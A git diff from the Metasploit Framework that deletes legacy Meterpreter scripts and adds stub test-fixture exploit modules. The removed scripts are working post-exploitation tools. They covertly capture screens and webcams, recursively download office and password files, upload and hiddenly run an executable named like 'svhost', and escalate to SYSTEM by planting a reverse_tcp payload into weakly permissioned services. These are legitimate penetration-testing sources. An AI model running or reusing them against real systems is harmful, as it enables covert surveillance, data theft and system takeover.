- when '-t'
- count = val.to_i
- when '-s'
- localsys = val.to_s
-
- when "-h"
- print_line
- print_line "Screenspy v1.0"
- print_line "--------------"
- print_line
- print_line
- print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
- print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
- print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
- print_line
- print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com"
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-session = client
-
-
-
-host,port = session.session_host, session.session_port
-
-print_status("New session on #{host}:#{port}...")
-
-logs = ::File.join(Msf::Config.install_root, 'logs', 'screenshot', host)
-
-outfile = ::File.join(Msf::Config.log_directory,file)
-
-::FileUtils.mkdir_p(logs)
-
-
-begin
- process2mig = "explorer.exe"
-
- # Actual migration
- mypid = session.sys.process.getpid
- session.sys.process.get_processes().each do |x|
- if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)
- print_status("#{process2mig} Process found, migrating into #{x['pid']}")
- session.core.migrate(x['pid'].to_i)
- print_status("Migration Successful!!")
- end
- end
-rescue
- print_status("Failed to migrate process!")
- #next
-end
-
-
-begin
- session.core.use("espia")
-
-
- begin
-
- data="#{host}"
- path1 = File.join(logs,"video.html")
- File.open(path1, 'w') do |f2|
- f2.puts(data)
- end
-
-
- if (localsys == "windows")
-
- print_status("Runing in local mode => windows")
- print_status("Opening Interactive view...")
- localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
- else
- print_status("Runing in local mode => Linux")
- print_status("Opening Interactive view...")
- localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
- end
-
- system (localcmd)
- (1..count).each do |i|
- sleep(freq) if(i != 1)
- path = File.join(logs,"screenshot.jpeg")
- data = session.espia.espia_image_get_dev_screen
-
- if(data)
- ::File.open(path, 'wb') do |fd|
- fd.write(data)
- fd.close()
- end
- end
- end
-
- rescue ::Exception => e
- print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
- end
-
- print_status("The interactive Session ended...")
- data = <<-EOS
-#{host} - Interactive Session ended
-
-
-EOS
- File.open(path1, 'w') do |f2|
- f2.puts(data)
- end
-
-rescue ::Exception => e
- print_status("Exception: #{e.class} #{e} #{e.backtrace}")
-end
-
-
-
-
-
-
-
diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb
deleted file mode 100644
index 1c5148bfc4..0000000000
--- a/scripts/meterpreter/search_dwld.rb
+++ /dev/null
@@ -1,107 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-## Meterpreter script that recursively search and download
-## files matching a given pattern
-## Provided by Nicob
-
-## == WARNING ==
-## As said by mmiller, this kind of script is slow and noisy :
-## http://www.metasploit.com/archive/framework/msg01670.html
-## However, it can sometimes save your ass ;-)
-## == WARNING ==
-
-# Filters
-$filters = {
- 'office' => '\.(doc|docx|ppt|pptx|pps|xls|xlsx|mdb|od.)$',
- 'win9x' => '\.pwl$',
- 'passwd' => '(pass|pwd)',
-}
-
-@@opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ]
-)
-
-def usage
- print_line "search_dwld -- recursively search for and download files matching a given pattern"
- print_line "USAGE: run search_dwld [base directory] [filter] [pattern]"
- print_line
- print_line "filter can be a defined pattern or 'free', in which case pattern must be given"
- print_line "Defined patterns:"
- print_line $filters.keys.sort.collect{|k| "\t#{k}"}.join("\n")
- print_line
- print_line "Examples:"
- print_line " run search_dwld"
- print_line " => recursively look for (MS|Open)Office in C:\\"
- print_line " run search_dwld %USERPROFILE% win9x"
- print_line " => recursively look for *.PWL files in the user home directory"
- print_line " run search_dwld E:\\\\ free '\.(jpg|png|gif)$'"
- print_line " => recursively look for pictures in the E: drive"
- print_line(@@opts.usage)
- raise Rex::Script::Completed
-end
-
-@@opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- end
-}
-
-def scan(path)
- begin
- dirs = client.fs.dir.foreach(path)
- rescue ::Rex::Post::Meterpreter::RequestError => e
- print_error("Error scanning #{path}: #{$!}")
- return
- end
-
- dirs.each {|x|
- next if x =~ /^(\.|\.\.)$/
- fullpath = path + '\\' + x
-
- if client.fs.file.stat(fullpath).directory?
- scan(fullpath)
- elsif fullpath =~ /#{$motif}/i
- # Replace ':' or '%' or '\' by '_'
- dst = fullpath.tr_s(":|\%|\\", "_")
- dst = Rex::FileUtils.clean_path(::Dir.tmpdir + ::File::Separator + dst)
- print_line("Downloading '#{fullpath}' to '#{dst}'")
- client.fs.file.download_file(dst, fullpath)
- end
- }
-end
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-unsupported if client.platform !~ /win32|win64/i
-# Get arguments
-basedir = args[0] || "C:\\"
-filter = args[1] || "office"
-
-# Set the regexp
-if filter == 'free'
- if args[2].nil?
- raise RuntimeError.new("free filter requires pattern argument")
- end
- $motif = args[2]
-else
- $motif = $filters[filter]
-end
-
-if $motif.nil?
- raise RuntimeError.new("Unrecognized filter")
-end
-
-# Search and download
-scan(basedir)
-
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
deleted file mode 100644
index 01d2f2b348..0000000000
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ /dev/null
@@ -1,210 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-##
-# Many services are configured with insecure permissions. This
-# script attempts to create a service, then searches through a list of
-# existing services to look for insecure file or configuration
-# permissions that will let it replace the executable with a payload.
-# It will then attempt to restart the replaced service to run the
-# payload. If that fails, the next time the service is started (such as
-# on reboot) the attacker will gain elevated privileges.
-#
-# scriptjunkie googlemail com
-#
-##
-
-if client.platform !~ /win32/
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-aggressive = false
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
- case opt
- when "-a"
- aggressive = true
- when "-h"
- print_status("Generic weak service permissions privilege escalation.")
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
-end
-
-envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
-tempdir = envs['TEMP']
-sysdir = envs['SYSTEMROOT']
-
-# Get the exe payload.
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-raw = pay.generate
-exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-#and placing it on the target in %TEMP%
-tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = "#{tempdir}\\#{tempexename}.exe"
-print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
-fd = client.fs.file.new(tempexe, "wb")
-fd.write(exe)
-fd.close
-
-#get handler to be ready
-handler = client.framework.exploits.create("multi/handler")
-handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-handler.datastore['LHOST'] = rhost
-handler.datastore['LPORT'] = rport
-handler.datastore['InitialAutoRunScript'] = "migrate -f"
-handler.datastore['ExitOnSession'] = false
-#start a handler to be ready
-handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
-)
-
-#attempt to make new service
-client.railgun.kernel32.LoadLibraryA("advapi32.dll")
-client.railgun.get_dll('advapi32')
-client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
- [ "DWORD", "hService", "in" ]
-])
-
-#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
-
-print_status("Trying to add a new service...")
-adv = client.railgun.advapi32
-manag = adv.OpenSCManagerA(nil,nil,0x10013)
-if(manag["return"] != 0)
- # SC_MANAGER_CREATE_SERVICE = 0x0002
- newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
- #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
- #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
- if(newservice["return"] != 0)
- print_status("Created service... #{newservice["return"]}")
- ret = adv.StartServiceA(newservice["return"], 0, nil)
- print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
- service_delete("walservice")
- adv.CloseServiceHandle(newservice["return"])
- if aggressive == false
- adv.CloseServiceHandle(manag["return"])
- raise Rex::Script::Completed
- end
- else
- print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
- end
-else
- print_status("No privs to create a service...")
- manag = adv.OpenSCManagerA(nil,nil,1)
- if(manag["return"] == 0)
- print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
- end
-end
-print_status("Trying to find weak permissions in existing services..")
-#Search through list of services to find weak permissions, whether file or config
-serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-#for each service
-service_list.each do |serv|
- begin
- srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
- if srvtype != "16"
- continue
- end
- moved = false
- configed = false
- #default path, but there should be an ImagePath registry key
- source = "#{sysdir}\\system32\\#{serv}.exe"
- #get path to exe; parse out quotes and arguments
- sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
- sourcemaybe = client.fs.file.expand_path(sourceorig)
- if( sourcemaybe[0] == '"' )
- sourcemaybe = sourcemaybe.split('"')[1]
- else
- sourcemaybe = sourcemaybe.split(' ')[0]
- end
- begin
- client.fs.file.stat(sourcemaybe) #check if it really exists
- source = sourcemaybe
- rescue
- print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
- end
- #try to exploit weak file permissions
- if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
- client.railgun.kernel32.CopyFileA(tempexe, source, false)
- print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
- moved = true
- end
- #try to exploit weak config permissions
- #open with SERVICE_CHANGE_CONFIG (0x0002)
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- if(servhandleret["return"] != 0)
- #SERVICE_NO_CHANGE is 0xFFFFFFFF
- if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
- print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
- configed = true
- end
- adv.CloseServiceHandle(servhandleret["return"])
-
- end
- if(moved != true && configed != true)
- print_status("No exploitable weak permissions found on #{serv}")
- continue
- end
- print_status("Restarting #{serv}")
- #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
- servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
- if(servhandleret["return"] != 0)
- #SERVICE_CONTROL_STOP = 0x00000001
- if(adv.ControlService(servhandleret["return"],1,56))
- client.railgun.kernel32.Sleep(1000)
- adv.StartServiceA(servhandleret["return"],0,nil)
- print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
- #Cleanup
- if moved == true
- client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
- end
- if configed == true
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
- adv.CloseServiceHandle(servhandleret["return"])
- end
- if aggressive == false
- raise Rex::Script::Completed
- end
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- adv.CloseServiceHandle(servhandleret["return"])
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- rescue
- end
-end
-
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
deleted file mode 100644
index 4eefc6dd4b..0000000000
--- a/scripts/meterpreter/uploadexec.rb
+++ /dev/null
@@ -1,149 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-session = client
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-e" => [ true, "Executable or script to upload to target host." ],
- "-o" => [ true, "Options for executable." ],
- "-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
- "-x" => [ false,"Exit the session once the payload has been run." ],
- "-s" => [ true,"Sleep for a number of seconds after uploading before executing." ],
- "-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
- "-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
-)
-
-################## function declaration Declarations ##################
-def usage()
- print_line "UploadExec -- upload a script or executable and run it"
- print_line(@@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-def upload(session,file,trgloc = "")
- if not ::File.exist?(file)
- raise "File to Upload does not exists!"
- else
- if trgloc == ""
- location = session.sys.config.getenv('TEMP')
- else
- location = trgloc
- end
- begin
- ext = file[file.rindex(".") .. -1]
- if ext and ext.downcase == ".exe"
- fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
- else
- fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
- end
- print_status("\tUploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("\t#{file} uploaded!")
- print_status("\tUploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- raise e
- end
- end
- return fileontrgt
-end
-
-#Function for executing a list of commands
-def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
- r=''
- session.response_timeout=120
- if verbose == 1
- begin
- print_status "\tRunning command #{cmdexe}"
- r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
- while(d = r.channel.read)
- print_status("\t#{d}")
- end
- r.channel.close
- r.close
- rescue ::Exception => e
- print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
- raise e
- end
- else
- begin
- print_status "\trunning command #{cmdexe}"
- r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
- r.close
- rescue ::Exception => e
- print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
- raise e
- end
- end
-end
-
-def m_unlink(session, path)
- r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
- while(r.name)
- select(nil, nil, nil, 0.10)
- end
- r.close
-end
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-unsupported if client.platform !~ /win32|win64/i
-#parsing of Options
-file = ""
-cmdopt = nil
-helpcall = 0
-path = ""
-verbose = 0
-remove = 0
-quit = 0
-sleep_sec = nil
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-e"
- file = val || ""
- when "-o"
- cmdopt = val
- when "-p"
- path = val
- when "-v"
- verbose = 1
- when "-h"
- helpcall = 1
- when "-s"
- sleep_sec = val.to_f
- when "-r"
- remove = 1
- when "-x"
- quit = 1
- end
-
-}
-
-if args.length == 0 || helpcall == 1
- usage
-end
-print_status("Running Upload and Execute Meterpreter script....")
-exec = upload(session,file,path)
-if sleep_sec
- print_status("\tSleeping for #{sleep_sec}s...")
- Rex.sleep(sleep_sec)
-end
-cmd_on_trgt_exec(session,exec,cmdopt,verbose)
-if remove == 1
- print_status("\tDeleting #{exec}")
- m_unlink(session, exec)
-end
-
-if quit == 1
- print_status("Closing the session...")
- session.core.shutdown rescue nil
- session.shutdown_passive_dispatcher
-end
-
-print_status("Finished!")
diff --git a/scripts/meterpreter/webcam.rb b/scripts/meterpreter/webcam.rb
deleted file mode 100644
index e52da0a992..0000000000
--- a/scripts/meterpreter/webcam.rb
+++ /dev/null
@@ -1,141 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: scriptjunkie
-#
-# Simplify running webcam, whether grabbing a single frame or running
-# a continous loop.
-
-@client = client
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu" ],
- "-f" => [ false, "Just grab single frame"],
- "-l" => [ false, "Keep capturing in a loop (default)" ],
- "-d" => [ true, "Loop delay interval (in ms, default 1000)" ],
- "-i" => [ true, "The index of the webcam to use (Default: 1)" ],
- "-q" => [ true, "The JPEG image quality (Default: 50)" ],
- "-g" => [ false, "Send to GUI instead of writing to file" ],
- "-s" => [ true, "Stop recording" ],
- "-p" => [ true, "The path to the folder images will be saved in (Default: current working directory)" ],
- "-a" => [ false, "Store copies of all the images capture instead of overwriting the same file (Default: overwrite single file)" ]
-)
-iterator = 0
-folderpath = "."
-single = false
-quality = 50
-index = 1
-interval = 1000
-gui = false
-saveAll = false
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- print_line "webcam -- view webcam over session"
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-f"
- single = true
- when "-l"
- single = false
- when "-d"
- interval = val.to_i
- when "-i"
- index = val.to_i
- when "-q"
- quality = val.to_i
- when "-g"
- gui = true
- when "-p"
- folderpath = val
- when "-s"
- print_line("[*] Stopping webcam")
- client.webcam.webcam_stop
- raise Rex::Script::Completed
- when "-a"
- saveAll = true
- end
-}
-
-if !(client.platform =~ /win32|win64/)
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-begin
- camlist = client.webcam.webcam_list
- if camlist.length == 0
- print_error("Error: no webcams found!")
- raise Rex::Script::Completed
- elsif camlist.length < index
- print_error("Error: only #{camlist.length} webcams found!")
- raise Rex::Script::Completed
- end
- print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}")
- client.webcam.webcam_start(index)
-
- #prepare output
- if(gui)
- sock = Rex::Socket::Udp.create(
- 'PeerHost' => "127.0.0.1",
- 'PeerPort' => 16235
- )
- end
- imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg"
- print_line( "[*] imagepath is #{imagepath}" )
- htmlpath = folderpath + ::File::SEPARATOR + "webcam.htm"
- begin
- if single == true
- data = client.webcam.webcam_get_frame(quality)
- if(gui)
- sock.write(data)
- else
- ::File.open( imagepath, 'wb' ) do |fd|
- fd.write( data )
- end
- path = ::File.expand_path( imagepath )
- print_line( "[*] Image saved to : #{path}" )
- Rex::Compat.open_file( path )
- end
- else
- if(!gui)
- ::File.open(htmlpath, 'wb' ) do |fd|
- htmlOut = ""
- fd.write(htmlOut)
- end
- print_line( "[*] View live stream at: #{htmlpath}" )
- Rex::Compat.open_file(htmlpath)
- print_line( "[*] Image saved to : #{imagepath}" )
- end
- while true do
- data = client.webcam.webcam_get_frame(quality)
- if(gui)
- sock.write(data)
- else
- ::File.open( imagepath, 'wb' ) do |fd|
- fd.write( data )
- ::File.open(htmlpath, 'wb' ) do |fd|
- htmlOut = ""
- fd.write(htmlOut)
- if(saveAll)
- iterator = iterator + 1
- imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg"
- end
- end
- end
- end
- select(nil, nil, nil, interval/1000.0)
- end
- end
- rescue ::Interrupt
- rescue ::Exception => e
- print_error("Error getting frame: #{e.class} #{e} #{e.backtrace}")
- end
- print_line("[*] Stopping webcam")
- client.webcam.webcam_stop
- sock.close if sock != nil
-rescue ::Exception => e
- print_error("Error: #{e.class} #{e} #{e.backtrace}")
-end
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
deleted file mode 100644
index a2ae3d1b9d..0000000000
--- a/scripts/meterpreter/wmic.rb
+++ /dev/null
@@ -1,137 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
-# and Windows XP and Windows 2008 targets.
-#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
-################## Variable Declarations ##################
-session = client
-wininfo = client.sys.config.sysinfo
-# Setting Arguments
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
- "-f" => [ true,"File where to saved output of command."],
- "-s" => [ true,"Text file with list of commands, one per line."]
-)
-#Setting Argument variables
-commands = []
-script = []
-outfile = nil
-
-################## Function Declarations ##################
-# Function for running a list of WMIC commands stored in a array, returs string
-def wmicexec(session,wmiccmds= nil)
- tmpout = ''
- session.response_timeout=120
- begin
- tmp = session.sys.config.getenv('TEMP')
- wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
- wmiccmds.each do |wmi|
- print_status "running command wmic #{wmi}"
- print_line wmicfl
- r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
- sleep(2)
- #Making sure that wmic finishes before executing next wmic command
- prog2check = "wmic.exe"
- found = 0
- while found == 0
- session.sys.process.get_processes().each do |x|
- found =1
- if prog2check == (x['name'].downcase)
- sleep(0.5)
- found = 0
- end
- end
- end
- r.close
- end
- # Read the output file of the wmic commands
- wmioutfile = session.fs.file.new(wmicfl, "rb")
- until wmioutfile.eof?
- tmpout << wmioutfile.read
- end
- wmioutfile.close
- rescue ::Exception => e
- print_status("Error running WMIC commands: #{e.class} #{e}")
- end
- # We delete the file with the wmic command output.
- c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
- c.close
- tmpout
-end
-# Function for writing results of other functions to a file
-def filewrt(file2wrt, data2wrt)
- output = ::File.open(file2wrt, "a")
- data2wrt.each_line do |d|
- output.puts(d)
- end
- output.close
-end
-
-#check for proper Meterpreter Platform
-def unsupported
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-
-def usage
- print_line("Windows WMIC Command Execution Meterpreter Script ")
- print_line @@exec_opts.usage
- print_line("USAGE:")
- print_line("run wmic -c \"WMIC Command Argument\"\n")
- print_line("NOTE:")
- print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
- print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
- print_line("Example:")
- print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
- raise Rex::Script::Completed
-end
-
-################## Main ##################
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-c"
-
- commands.concat(val.split("/"))
-
- when "-s"
-
- script = val
- if not ::File.exist?(script)
- raise "Command List File does not exists!"
- else
- ::File.open(script, "r").each_line do |line|
- next if line.strip.length < 1
- next if line[0,1] == "#"
- commands << line.chomp
- end
- end
- when "-f"
-
- outfile = val
- when "-h"
- usage
- else
- print_error "Unknown option: #{opt}"
- usage
- end
-
-}
-
-if args.length == 0
- usage
-end
-unsupported if client.platform !~ /win32|win64/i
-
-if outfile == nil
- print_status wmicexec(session,commands)
-else
- print_status("Saving output of WMIC to #{outfile}")
- filewrt(outfile, wmicexec(session,commands))
-end
diff --git a/spec/file_fixtures/modules/exploits/auto_target_linux.rb b/spec/file_fixtures/modules/exploits/auto_target_linux.rb
new file mode 100644
index 0000000000..8d3c4efed6
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/auto_target_linux.rb
@@ -0,0 +1,144 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit Auto-Targeting for Linux',
+ 'Description' => %q{ This module is a test bed for automatic targeting for Linux exploits. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Linux Heap Brute Force (Debian/Ubuntu)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x08352000 },
+ 'Stop' => { 'Ret' => 0x0843d000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (Gentoo)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80310000 },
+ 'Stop' => { 'Ret' => 0x8042f000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+
+
+ ['Linux Heap Brute Force (Mandriva)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80380000 },
+ 'Stop' => { 'Ret' => 0x8045b000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (RHEL/CentOS)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0xb800f000 },
+ 'Stop' => { 'Ret' => 0xb80c9000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (SUSE)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x80365000 },
+ 'Stop' => { 'Ret' => 0x80424000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (Slackware)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86 ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x8033c000 },
+ 'Stop' => { 'Ret' => 0x80412000 },
+ 'Step' => 60*1024,
+
+ }
+ }
+ ],
+
+ ['Linux Heap Brute Force (OpenWRT MIPS)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_MIPSBE ],
+ 'Nops' => 64*1024,
+ 'Bruteforce' =>
+ {
+ 'Start' => { 'Ret' => 0x55900000 },
+ 'Stop' => { 'Ret' => 0x559c0000 },
+ 'Step' => 60*1024,
+ }
+ }
+ ]
+ ],
+ 'DisclosureDate' => 'Jan 01 1999'
+ ))
+ end
+
+ def exploit
+ print_status("This exploit doesn't actually do anything")
+ print_status "Target Selected: #{target.name}"
+ end
+
+
+end
\ No newline at end of file
diff --git a/spec/file_fixtures/modules/exploits/auto_target_windows.rb b/spec/file_fixtures/modules/exploits/auto_target_windows.rb
new file mode 100644
index 0000000000..ee6d7711ea
--- /dev/null
+++ b/spec/file_fixtures/modules/exploits/auto_target_windows.rb
@@ -0,0 +1,75 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Exploit::Remote::Tcp
+ Rank = ManualRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Exploit Auto-Targeting for Windows',
+ 'Description' => %q{ This module is a test bed for automatic targeting for Windows exploits. },
+ 'Author' => [ 'thelightcosine' ],
+ 'License' => MSF_LICENSE,
+ 'Privileged' => true,
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 10,
+ 'EXITFUNC' => 'thread'
+ },
+ 'Payload' =>
+ {
+ 'Space' => 3072,
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['Windows 2000 Universal',
+ {
+ 'Ret' => 0x001f1cb0,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP EDI SVCHOST.EXE
+
+ #
+ # Standard return-to-ESI without NX bypass
+ # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
+ #
+ ['Windows XP SP0/SP1 Universal',
+ {
+ 'Ret' => 0x01001361,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP0 Universal',
+ {
+ 'Ret' => 0x0100129e,
+ 'Scratch' => 0x00020408,
